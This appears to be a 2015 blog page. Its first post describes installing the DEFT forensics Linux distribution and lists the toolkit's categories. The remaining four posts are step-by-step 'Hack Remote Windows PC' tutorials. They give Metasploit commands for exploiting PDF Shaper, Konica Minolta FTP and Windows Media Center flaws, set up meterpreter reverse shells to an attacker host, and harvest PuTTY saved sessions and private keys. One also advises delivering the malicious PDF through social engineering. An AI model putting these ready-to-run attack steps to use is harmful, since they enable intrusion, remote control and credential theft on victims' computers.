Forensic Investigation Tutorial Using DEFT

at 2:40 AM Friday, September 25, 2015 0 comments
DEFT (acronym for Digital Evidence & Forensics Toolkit) is a distribution made for Computer Forensics, with the purpose of running live on systems without tampering or corrupting devices (hard disks, pen drives, etc…) connected to the PC where the boot process takes place.

The DEFT system is based on GNU Linux; it can run live (via DVDROM or USB pen drive), installed or run as a Virtual Appliance on VMware or Virtual box. DEFT employs LXDE as desktop environment and WINE for executing Windows tools under Linux. It features a comfortable mount manager for device management.

First Download ISO image of deft Linux from here


After having started the DEFT boot loader, you will see a screen with several boot options. Now click on Install DEFT Linux 8


Now click on continue


Now Select the third party software option and click on continue.


Now it will ask the option to install Kubuntu.
Select Guided-use entire disk and click on install now


Now select your time zone and click ok


Now fill your personal Details and select Continue. Click on Restart Now.



Analysis - Analysis Tools files of different types


Antimalware - Search for root kits, viruses, malware and malicious PDFs.


Data Recovery - File Recovery Software


Hashing - Scripts that allow the realization of calculating hashes of certain processes (SHA1, SHA256, MD5 ...)


Imaging - Applications that we can use to make cloned and imaging of hard drives or other sources.


Mobile Forensics - Analysis Blackberry, Android, iPhone, as well as information about typical databases SQLite mobile devices used by applications.


Network Forensics - Tools for processing information stored in network


OSINT - Applications that facilitate obtaining information associated with users and their activity.


Password recovery - Recovery BIOS passwords, compressed files, office, brute force, etc.


Reporting tools - Finally, within this section you will find tools that will facilitate the task of reporting and obtaining evidence that will serve to document forensics. Screen capture, collection of notes, desktop activity log, etc.


Labels:

Hack Remote Windows PC using PDF Shaper Buffer Overflow

at 1:43 AM Monday, September 21, 2015 0 comments
PDF Shaper is prone to security vulnerability when processing PDF files. The vulnerability appear when we use Convert PDF to Image and use a specially crafted PDF file. This Metasploit module has been tested successfully on Win Xp, Win 7, Win 8, and Win 10.

Exploit Targets
PDF Shaper

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit  


After we successfully generate the malicious pdf File, it will stored on your local computer
/root/.msf4/local/msf.pdf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
exploit

Now send your msf.pdf files to victim using any social engineering technique. Now when the victim will use PDF Shaper tool and click on PDF to Image option


Now it will show Add File Option, victim will select the msf.pdf and click on Convert option.




Now you will get the meterpreter of victim PC.

Labels: ,

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

at 11:32 AM Saturday, September 19, 2015 0 comments
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets
Konica Minolta FTP Server 1.00

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit


Labels: ,

Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

at 11:40 AM Friday, September 18, 2015 0 comments
This module exploits vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms15_100_mclexe)>set lport 443
msf exploit (ms15_100_mclexe)>exploit


Now when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe) it will show the page like given below




Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Labels: ,

How to Hack Saved sessions in Putty using Metasploit

at 1:05 AM 0 comments
This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session information from the registry. PuTTY is very configurable; some users may have configured saved sessions which could include a username, private key file to use when authenticating, host name etc. If a private key is configured, an attempt will be made to download and store it in loot. It will also record the SSH host keys which have been stored. These will be connections that the user has previously after accepting the host SSH fingerprint and therefore are of particular interest if they are within scope of a penetration test.

Exploit Targets
Putty

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use post/windows/gather/enum_putty_saved_sessions
msf exploit (enum_putty_saved_sessions)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_putty_saved_sessions)>set lhost 192.168.0.121 (IP of Local Host)
msf exploit (enum_putty_saved_sessions)>set session 1
msf exploit (enum_putty_saved_sessions)>exploit  


The above exploit will save all session in the specified folder. Open the folder and click on session file. It will show us the session information.

Labels: ,
Subscribe to: Posts (Atom)